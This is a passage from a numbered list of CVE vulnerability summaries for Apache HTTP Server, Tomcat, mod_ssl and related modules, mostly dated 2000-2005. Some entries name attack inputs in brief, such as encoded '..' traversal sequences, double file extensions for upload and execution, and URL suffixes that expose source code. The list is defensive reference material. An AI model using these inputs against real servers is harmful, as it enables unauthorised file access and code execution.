5972| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
5973| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
5974| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
5975| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
5976| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
5977| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
5978| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
5979| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
5980| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
5981| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
5982| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
5983| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
5984| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
5985| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
5986| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
5987| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
5988| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
5989| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
5990| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
5991| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
5992| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
5993| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
5994| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
5995| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
5996| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
5997| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
5998| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
5999| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
6000| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
6001| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
6002| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
6003| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
6004| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
6005| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
6006| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
6007| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
6008| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
6009| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
6010| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
6011| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
6012| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
6013| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
6014| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
6015| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
6016| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
6017| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
6018| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
6019| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
6020| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
6021| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
6022| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
6023| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
6024| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
6025| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
6026| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
6027| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
6028| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
6029| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
6030| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
6031| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
6032| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
6033| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
6034| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
6035| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
6036| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
6037| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
6038| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
6039| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
6040| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
6041| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
6042| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
6043| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
6044| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
6045| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
6046| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
6047| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
6048| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
6049| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
6050| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
6051| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
6052| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
6053| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
6054| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
6055| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
6056| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
6057| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
6058| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
6059| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
6060| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
6061| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
6062| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
6063| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
6064| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
6065| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
6066| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
6067| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
6068| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
6069| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
6070| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
6071| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
6072| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
6073| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
6074| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
6075| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
6076| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
6077| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
6078| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
6079| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
6080| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
6081| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
6082| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
6083| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
6084| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
6085| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
6086| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
6087| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
6088| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
6089| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
6090| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
6091| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
6092| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
6093| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
6094| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
6095| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
6096| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
6097| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
6098| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
6099| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
6100| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
6101| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
6102| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
6103| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
6104| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
6105| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
6106| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
6107| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
6108| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
6109| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
6110| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
6111| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
6112| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
6113| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
6114| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
6115| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
